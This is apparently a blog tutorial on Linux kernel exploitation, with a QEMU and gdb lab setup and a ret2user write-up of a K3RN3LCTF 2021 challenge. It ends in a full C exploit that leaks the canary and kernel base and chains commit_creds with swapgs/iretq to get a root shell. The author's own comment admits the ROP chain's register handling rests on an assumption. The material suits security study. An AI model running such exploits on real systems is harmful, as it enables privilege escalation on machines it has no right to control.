The Linux kernel is the layer between user applications and hardware. It manages the CPU, memory, devices, file systems, networking, process control, and much more. It’s a complex project with tens of millions of lines of code, and it’s still evolving. Such a dynamic project is an ideal research target.

Kernelspace vs Userspace exploitation (x86_64)

If you’re coming from userspace exploitation (like me), you may notice the following differences when writing kernel exploits.

More instructions

Kernel code runs in ring 0 and can execute privileged instructions that are not available to userspace, such as:

LGDT - Loads the base address and limit of a GDT into GDTR
LLDT - Loads a segment selector for an LDT into LDTR
LTR - Loads a segment selector into the Task Register (TR)
MOV to/from control registers - Reads or writes a control register (CR0, CR2, CR3, CR4, CR8)
LMSW - Loads the Machine Status Word (the low 16 bits of CR0)
CLTS - Clears the Task Switched flag in control register CR0
MOV to/from debug registers - Reads or writes a debug register (DR0-DR7)
INVD - Invalidates the caches without writeback
INVLPG - Invalidates a TLB entry
WBINVD - Writes back and invalidates the caches
HLT - Halts the processor
RDMSR - Reads a Model Specific Register (MSR)
WRMSR - Writes a Model Specific Register (MSR)
RDPMC - Reads a Performance Monitoring Counter
RDTSC - Reads the Time Stamp Counter

The exceptions are RDTSC and RDPMC: RDTSC can also be run from userspace unless the TSD flag in CR4 is set, and RDPMC can be run from userspace when the PCE flag in CR4 is set.

More registers

When debugging the kernel with gdb we can see additional registers:

fs_base - base address of fs
gs_base - base address of gs
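k_gs_base - the IA32_KERNEL_GS_BASE MSR; the swapgs instruction exchanges its value with gs_base when switching from userspace to kernelspace or vice versa
cr0 - control register holding system flags such as protected mode (PE), write protect (WP) and paging (PG)
cr2 - holds the faulting linear address after a page fault
cr3 - holds the physical address of the top-level page table
cr4 - control register holding feature flags such as TSD, SMEP and SMAP
cr8 - task priority register (TPR)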
efer - Extended Feature Enable Register
mxcsr - control and status for SSE registers
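
Several of the flags mentioned in this post live in cr4, so it helps to be able to read the raw value gdb prints. The sketch below decodes a few of them. The bit positions are the ones documented in the Intel SDM; the helper name cr4_has and the sample value in the note afterwards are made up for illustration.

```c
#include <stdint.h>

/* Bit positions inside CR4 (Intel SDM, Vol. 3). */
enum cr4_bit {
    CR4_TSD  = 2,   /* Time Stamp Disable: RDTSC is ring 0 only when set */
    CR4_PCE  = 8,   /* Performance Counter Enable: RDPMC allowed in userspace when set */
    CR4_SMEP = 20,  /* Supervisor Mode Execution Prevention */
    CR4_SMAP = 21,  /* Supervisor Mode Access Prevention */
};

/* Returns 1 if the given bit is set in the cr4 value, 0 otherwise. */
int cr4_has(uint64_t cr4, enum cr4_bit bit)
{
    return (int)((cr4 >> bit) & 1);
}
```

For a hypothetical cr4 value of 0x3006f0, cr4_has reports SMEP and SMAP as set and TSD and PCE as clear, which would mean RDTSC works from userspace and RDPMC does not.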

What are the goals of exploitation?

The goal usually revolves around gaining higher privileges on the system or gaining persistence.

Some of the goals can be:

Get root

payload: commit_creds(prepare_kernel_cred(0))

Escape SECCOMP

payload: current->thread_info.flags &= ~(1 << TIF_SECCOMP)

Run single command

payload: run_cmd("/path_to_command")
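
The SECCOMP payload above is plain bit manipulation, so it can be modelled in userspace. This is only a sketch of the arithmetic: it assumes TIF_SECCOMP is bit 8, which is what I remember from arch/x86/include/asm/thread_info.h on older x86_64 kernels. Check the headers of your target, since newer kernels may keep this flag elsewhere. The function name clear_seccomp_flag is made up.

```c
/* Assumption: TIF_SECCOMP is bit 8 on the target x86_64 kernel. */
#define TIF_SECCOMP 8

/* Returns the flags word with only the TIF_SECCOMP bit cleared. */
unsigned long clear_seccomp_flag(unsigned long flags)
{
    return flags & ~(1UL << TIF_SECCOMP);
}
```

Every other bit in the flags word is left untouched, which matters because the same word carries unrelated thread state.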

Setup

Install prerequisites

sudo apt install -y bison flex libelf-dev cpio build-essential libssl-dev qemu-system-x86 libncurses-dev

Build the Linux kernel with debug symbols

git clone https://github.com/torvalds/linux # or download specific kernel version from https://mirrors.edge.kernel.org/pub/linux/kernel/
cd linux && make defconfig && make menuconfig
# Ensure that kernel hacking --> Compile-time checks and compiler options --> Compile the kernel with debug symbols is checked.
make -j$(nproc)

Build BusyBox

Download and decompress busybox (I chose the latest version at the time).

wget https://busybox.net/downloads/busybox-1.36.1.tar.bz2
tar xvf busybox-1.36.1.tar.bz2

Build it.

cd busybox-1.36.1
make defconfig
make menuconfig

In the Busybox Settings menu, select Build Options, and check the box next to Build BusyBox as a static binary (no shared libs). Next, specify the output folder.

make
make CONFIG_PREFIX=./../busybox_rootfs install

Build initramfs

Create a directory hierarchy for initramfs.

mkdir -p initramfs/{bin,dev,etc,home,mnt,proc,sys,usr,tmp}
cd initramfs/dev
sudo mknod sda b 8 0 
sudo mknod console c 5 1

Copy everything from the busybox_rootfs folder to the initramfs folder. Next, create an init file in the root of initramfs, and write the following into it:

#!/bin/sh

mount -t proc none /proc
mount -t sysfs none /sys

/bin/mount -t devtmpfs devtmpfs /dev
chown 1337:1337 /tmp

setsid cttyhack setuidgid 1337 sh

exec /bin/sh

Make the script executable.

chmod +x init

Create initramfs itself.

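# Run from the root of the initramfs directory. Writing the archive one level up keeps it from including itself.
find . -print0 | cpio --null -ov --format=newc > ../initramfs.cpio
gzip ../initramfs.cpio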

This creates the initramfs.cpio.gz file, which we will use as the root filesystem for our QEMU-emulated Linux kernel.

Run with qemu

qemu-system-x86_64 \
    -m 512M \
    -nographic \
    -kernel bzImage \
    -append "console=ttyS0 loglevel=3 oops=panic panic=-1 nopti nokaslr" \
    -no-reboot \
    -cpu qemu64 \
    -smp 1 \
    -monitor /dev/null \
    -initrd initramfs.cpio.gz \
    -net nic,model=virtio \
    -net user \
    -gdb tcp::1234 \
    -S

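The -gdb tcp::1234 flag starts a gdbstub listener on port 1234. The -S flag keeps QEMU halted at startup until a debugger connects and resumes execution. The bzImage passed to -kernel is produced by the kernel build at arch/x86/boot/bzImage.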

Debugging

For debugging, run the QEMU instance with the -gdb and -S flags. Open gdb in another terminal and connect to it:

target remote :1234

As for gdb extensions, use whichever one works for you. I use gef, although most things can be accomplished with plain gdb.

Shellcoding

If you know what you want to accomplish with code but don’t know how to do it at the assembly level, write a kernel module, compile it, and dump the assembly.

objdump -M intel -d test.ko

Kernel modules

Kernel modules are pieces of code that can be loaded into and unloaded from the kernel on the fly, without rebooting the system. They are a great starting point for learning kernel exploitation because they run with kernel privileges.

To load a kernel module you can use:

sudo insmod <module_name.ko>

To unload a kernel module:

sudo rmmod <module_name>

To list currently loaded modules:

lsmod

Kernel modules that expose a device or /proc file define a struct file_operations (often named fops), which specifies the functions that are called when userspace calls read, write, open, close or ioctl on that file.

static struct file_operations module_fops =
{
    .owner   = THIS_MODULE,
    .read    = module_read,
    .write   = module_write,
    .open    = module_open,
    .release = module_close,
};

We can start auditing each of these functions in our search for bugs.
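
From userspace, each handler is reached with the matching syscall on the module's file. The helper below is a minimal sketch of that mapping, not part of any challenge: the name poke_device is made up, and the 16-byte buffer is deliberately small so that the calls are harmless.

```c
#include <fcntl.h>
#include <unistd.h>

/* Touches open, read, write and close on the given path.
 * Returns 0 if every call succeeded, -1 otherwise. */
int poke_device(const char *path)
{
    char buf[16] = {0};
    int fd = open(path, O_RDWR);                 /* dispatched to .open */
    if (fd < 0)
        return -1;

    int ok = read(fd, buf, sizeof buf) >= 0      /* dispatched to .read */
          && write(fd, buf, sizeof buf) >= 0;    /* dispatched to .write */

    close(fd);                                   /* last close ends up in .release */
    return ok ? 0 : -1;
}
```

Running something like this under gdb with breakpoints on the module's handlers is a quick way to confirm which kernel function each syscall lands in.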

Mitigations

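KASLR - randomizes the base address of the kernel at boot (similar to userspace ASLR)
FG-KASLR - function-granular KASLR; randomizes the placement of individual functions, so a single leaked address no longer reveals where every other function is
Kernel Stack Canary - a random value placed on the stack before the return address and checked before the function returns; this prevents some buffer overflow attacks (same as in userspace)
SMEP - Supervisor Mode Execution Prevention prevents the kernel from executing code located in userspace memory
SMAP - Supervisor Mode Access Prevention prevents the kernel from reading or writing userspace memory, except through explicitly permitted accesses such as copy_to_user and copy_from_user
KPTI - Kernel Page Table Isolation keeps separate page tables for userspace and kernelspace; it is a mitigation against the Meltdown CPU bug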

More mitigations can be found at https://github.com/a13xp0p0v/linux-kernel-defence-map
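
To see whether the CPU of a target supports SMEP and SMAP, you can look for the smep and smap tokens in the flags line of /proc/cpuinfo. The helper below is a small sketch for checking such a line. The name has_cpu_flag is made up, and a present flag only means the CPU supports the feature; the kernel can still be booted with it turned off.

```c
#include <string.h>

/* Returns 1 if `flag` appears as a whole whitespace-separated token
 * in `flags` (for example the "flags" line of /proc/cpuinfo), else 0. */
int has_cpu_flag(const char *flags, const char *flag)
{
    size_t n = strlen(flag);
    const char *p = flags;

    if (n == 0)
        return 0;

    while ((p = strstr(p, flag)) != NULL) {
        int starts = (p == flags) || p[-1] == ' ' || p[-1] == '\t';
        int ends = p[n] == '\0' || p[n] == ' ' || p[n] == '\n';
        if (starts && ends)
            return 1;
        p += n;  /* partial match, keep searching after it */
    }
    return 0;
}
```

The token check is there so that a longer flag name that merely contains the string does not count as a match.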

Ret2user

Let’s take a look at the ret2user technique, which is commonly used to escalate privileges. For this example I chose a challenge from K3RN3LCTF 2021 called easy_kernel, which can be downloaded here: https://github.com/seal9055/seal9055.github.io/blob/main/docs/kernel/kernel_rop.tar.gz

Vulnerability analysis

As I mentioned before, kernel modules are a great way to start learning Linux kernel exploitation. In this challenge we are provided with a vulnerable kernel module, vuln.ko, and its source code in vuln.c.

Analyzing the s_read function, we notice a fixed-size message buffer.

static ssize_t s_read(struct file *file, char __user *ubuf, size_t size, loff_t *offset)
{
    char message[40];

    strcpy(message, "Welcome to this kernel pwn series");

    if (raw_copy_to_user(ubuf, message, size) == 0) {
        printk(KERN_ALERT "%ld bytes read by device\n", size);
    }
    else {
        printk(KERN_ALERT "Some error occured in read\n");
    }

    return size;
}

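The size argument is controlled by the caller and is never checked against the 40-byte buffer, so reading more than 40 bytes copies adjacent kernel stack memory to userspace. That leak includes the stack canary and a return address, which is useful for bypassing Kernel Stack Canaries and KASLR.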
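
Turning a leaked return address into the kernel base is a single subtraction, but a sanity check catches a wrong offset early. The sketch below assumes that KASLR on x86_64 moves the image in 2 MiB steps (the default CONFIG_PHYSICAL_ALIGN, as far as I know) and that kernel text is mapped at or above 0xffffffff80000000. Both helper names are made up.

```c
#include <stdint.h>

/* Assumption: the kernel image is aligned to 2 MiB on this target. */
#define KERNEL_ALIGN 0x200000ULL
/* Assumption: start of the x86_64 kernel text mapping. */
#define KERNEL_TEXT_START 0xffffffff80000000ULL

/* leak: an address leaked from the kernel stack.
 * offset: the distance of that address from the kernel base in this build. */
uint64_t kernel_base_from_leak(uint64_t leak, uint64_t offset)
{
    return leak - offset;
}

/* Returns 1 if the computed base is plausibly a kernel image base. */
int base_looks_sane(uint64_t base)
{
    return base >= KERNEL_TEXT_START && (base & (KERNEL_ALIGN - 1)) == 0;
}
```

The offset has to be measured once in the debugger, for example by subtracting the base of a nokaslr boot from the leaked value, and it is only valid for that exact kernel build.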

Analyzing the s_write function, we notice it’s similar, but instead of reading from the buffer it writes user-supplied data into it.

static ssize_t s_write(struct file *file, const char __user *ubuf, size_t size, loff_t *offset)
{
    char buffer[40];

    if (raw_copy_from_user(buffer, ubuf, size) == 0) {
        printk(KERN_ALERT "%ld bytes written to device\n", size);
    }
    else {
        printk(KERN_ALERT "Some error occured in write\n");
    }

    return size;
}

Calling this function with more than 40 bytes triggers a stack buffer overflow, because size is again never checked against the length of the buffer.
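
The layout of the overflow can be sketched as a small helper. It assumes the stack frame observed in this challenge: five qwords of buffer, the canary at qword 5, one saved value at qword 6 and the return address at qword 7. Those indices have to be confirmed in gdb for any other build, and the name build_overflow is made up.

```c
#include <stddef.h>
#include <string.h>

#define CANARY_IDX 5  /* char buffer[40] is 5 qwords, the canary follows it */
#define RET_IDX    7  /* assumption: one saved value sits between canary and return address */

/* Fills payload with padding, the canary and the chain.
 * Returns the number of qwords used, or 0 if the chain does not fit. */
size_t build_overflow(unsigned long *payload, size_t cap,
                      unsigned long cookie,
                      const unsigned long *chain, size_t chain_len)
{
    if (RET_IDX + chain_len > cap)
        return 0;

    for (size_t i = 0; i < RET_IDX; i++)
        payload[i] = 0x4141414141414141UL;   /* padding */

    payload[CANARY_IDX] = cookie;            /* keep the canary check happy */
    memcpy(&payload[RET_IDX], chain, chain_len * sizeof *chain);
    return RET_IDX + chain_len;
}
```

Keeping the indices in named constants makes it easier to adapt the exploit when the frame layout differs.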

Exploitation

We have everything we need to start writing an exploit. Since this setup has no libc, we compile the exploit statically and pack it into the initramfs file system.

This is the plan for writing an exploit:

Leak the Kernel Stack Canary
Leak a kernel address to bypass KASLR
Save state for switching context between user-land and kernel-land (save registers for restoring them later)
Write a ROP chain to bypass SMEP and trigger the buffer overflow
Get a shell with system("/bin/sh")
Register a SIGSEGV signal handler for the KPTI bypass (this has to happen before the overflow; with KPTI enabled, returning to userspace while the kernel page tables are still active makes the process segfault)
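
The signal handler trick works because the kernel delivers SIGSEGV through its normal return path, and by then the process already has root credentials. The sketch below only demonstrates the userspace half of that: a handler registered with signal() runs when SIGSEGV arrives. It uses raise() instead of a real fault, and the names on_segv and install_and_raise are made up.

```c
#include <signal.h>

static volatile sig_atomic_t got_segv = 0;

/* Stand-in for the function that would spawn the shell. */
static void on_segv(int sig)
{
    (void)sig;
    got_segv = 1;
}

/* Registers the handler, sends SIGSEGV to ourselves and
 * returns 1 if the handler ran, 0 if not, -1 on error. */
int install_and_raise(void)
{
    if (signal(SIGSEGV, on_segv) == SIG_ERR)
        return -1;
    raise(SIGSEGV);
    return got_segv;
}
```

In the real exploit the handler is the function that checks getuid() and spawns the shell.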

Below is an example exploit that uses the ret2user technique and bypasses KASLR, Kernel Stack Canary, SMEP, SMAP and KPTI:

#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>

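// Used both as the iretq return target and as the SIGSEGV handler,
// so it takes the int argument that signal() expects.
void spawn_shell(int sig) {
    (void)sig;
    puts("[+] Returned to userland");

    if (getuid() == 0) system("/bin/sh");
    else puts("[-] Not root");
}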

unsigned long user_cs, user_ss, user_rflags, user_rsp;
int main() {
    // KPTI bypass
    signal(SIGSEGV, spawn_shell);

    int fd = open("/proc/pwn_device", O_RDWR);
    if (fd < 0) {
        puts("[-] Failed to open device");
        exit(1);
    }
    puts("[+] Opened device");

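    // Leak: read 64 bytes (8 qwords) out of the 40-byte stack buffer
    unsigned long buff[80] = {0};
    read(fd, buff, 64);

    unsigned long cookie = buff[5];          // stack canary, directly after the 40-byte buffer
    unsigned long base = buff[7] - 0x25de2e; // leaked return address minus its offset in this kernel build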
    printf("[+] Leaked cookie: 0x%lx\n", cookie);
    printf("[+] Leaked base: 0x%lx\n", base);

    // Save state
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_rsp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );

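    // Overflow: qwords 0-4 fill the buffer, 5 is the canary, 6 is padding, 7 is the return address
    unsigned long payload[40] = {[0 ... 39] = 0x4141414141414141};
    int i = 5;
    payload[i++] = cookie;
    payload[i++] = 0x4141414141414141;         // padding between canary and return address
    payload[i++] = base + 0x001778;            // pop rdi; ret;
    payload[i++] = 0x0;                        // rdi = 0
    payload[i++] = base + 0x08c340;            // prepare_kernel_cred
    // commit_creds takes the new cred pointer in rdi. There is no mov rdi, rax gadget
    // here, so the chain relies on rdi already holding that pointer on this build.
    payload[i++] = base + 0x08bf00;            // commit_creds
    payload[i++] = base + 0xc00f58;            // swapgs; ret;
    payload[i++] = base + 0x024952;            // iretq; ret;
    payload[i++] = (unsigned long)spawn_shell; // userland rip
    payload[i++] = user_cs;
    payload[i++] = user_rflags;
    payload[i++] = user_rsp;
    payload[i++] = user_ss;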

    write(fd, payload, sizeof payload);

    return 0;
}